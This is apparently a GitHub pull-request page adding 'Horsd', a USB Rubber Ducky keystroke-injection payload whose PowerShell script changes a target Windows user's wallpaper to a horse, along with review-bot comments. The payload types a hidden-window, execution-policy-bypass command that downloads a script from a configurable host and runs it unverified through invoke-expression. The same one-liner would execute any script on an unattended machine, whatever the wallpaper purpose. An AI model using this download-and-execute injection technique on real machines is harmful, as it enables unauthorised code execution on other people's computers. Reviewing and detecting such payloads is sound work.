Merge pull request #322 from MocconaCoffee/patch-1

Commit Horsd payload
pull/361/merge
Darren Kitchen 2023-06-09 19:34:32 -05:00 committed by GitHub
commit 92ad03f608
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
3 changed files with 56 additions and 0 deletions


@ -0,0 +1,3 @@
# Horsd - In memorium to my Nan
Changes the target users background to a picture of a brown horse running, a nod to my nan's laptop background.
** This script requires very minor configuration found on LN:23 of the payload, set your own direct access link to the horsd.ps1 powershell script.


@ -0,0 +1,18 @@
$Image="%UserProfile%/horse.jpg"
$code = @'
using System.Runtime.InteropServices;
namespace Win32{
public class Wallpaper{
[DllImport("user32.dll", CharSet=CharSet.Auto)]
static extern int SystemParametersInfo (int uAction , int uParam , string lpvParam , int fuWinIni) ;
public static void SetWallpaper(string thePath){
SystemParametersInfo(20,0,thePath,3);
}
}
}
'@
add-type $code
[Win32.Wallpaper]::SetWallpaper($Image)
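Review bot: `$Image="%UserProfile%/horse.jpg"` is passed to `SystemParametersInfo` as a literal string, because PowerShell does not expand cmd-style `%VAR%` references inside a double-quoted string. As far as I know the wallpaper call expects a full path, so the lookup probably fails unless the API happens to expand the variable itself; `$Image = Join-Path $env:USERPROFILE 'horse.jpg'` resolves it explicitly. `SetWallpaper` also discards the int returned by `SystemParametersInfo`, so a failed call is silent; returning that value and checking it at the call site would surface the error. A short comment naming the magic numbers would help the next reader, e.g. `// 20 = SPI_SETDESKWALLPAPER, 3 = SPIF_UPDATEINIFILE | SPIF_SENDCHANGE`.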


@ -0,0 +1,35 @@
REM Title: Horsd
REM Author: MocconaCoffee
REM Description: A simple script that will change the users wallpaper to Brown Horse that is running.
REM Dedicated to: This script is a toast to my Nan that passed recently (she pioneered horse backgrounds on her decade-old laptop.)
REM Target OS: Windows 10
REM Required Configurations: Ensure that you have amended changes to the URL with a direct link to the script hosted by your own hosting service. DO NOT use GitHub as a medium for staging the script.
DEFINE #SCRIPTURL example.com
DELAY 3000
GUI r
DELAY 300
STRING powershell
ENTER
DELAY 300
STRING Invoke-WebRequest -Uri https://i.imgur.com/jwstWRR.jpg -OutFile horse.jpg
ENTER
DELAY 100
STRING exit
ENTER
DELAY 1000
GUI r
DELAY 300
STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr #SCRIPTURL/horsd.ps1?dl=1; invoke-expression $pl
ENTER
DELAY 1000
GUI r
DELAY 300
STRING powershell
ENTER
DELAY 300
STRING Remove-Item horse.jpg
ENTER
DELAY 300
STRING exit
ENTER
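Review bot: The line `STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr #SCRIPTURL/horsd.ps1?dl=1; invoke-expression $pl` executes whatever the configured host returns, with no integrity check on the fetched script. The default `DEFINE #SCRIPTURL example.com` also carries no scheme, so nothing in the payload forces TLS; `DEFINE #SCRIPTURL https://example.com` would at least pin the transport. The REM header should state this trust assumption, for example `REM The target runs the fetched script unverified: host it only on a server you control, over HTTPS`. For reviewers and defenders, a hidden window combined with `-Exec Bypass` and `iwr` piped into `invoke-expression` is a pattern endpoint tooling commonly flags. Separately, the README points to LN:23 for configuration, but the `DEFINE` to edit is on line 7 of this file.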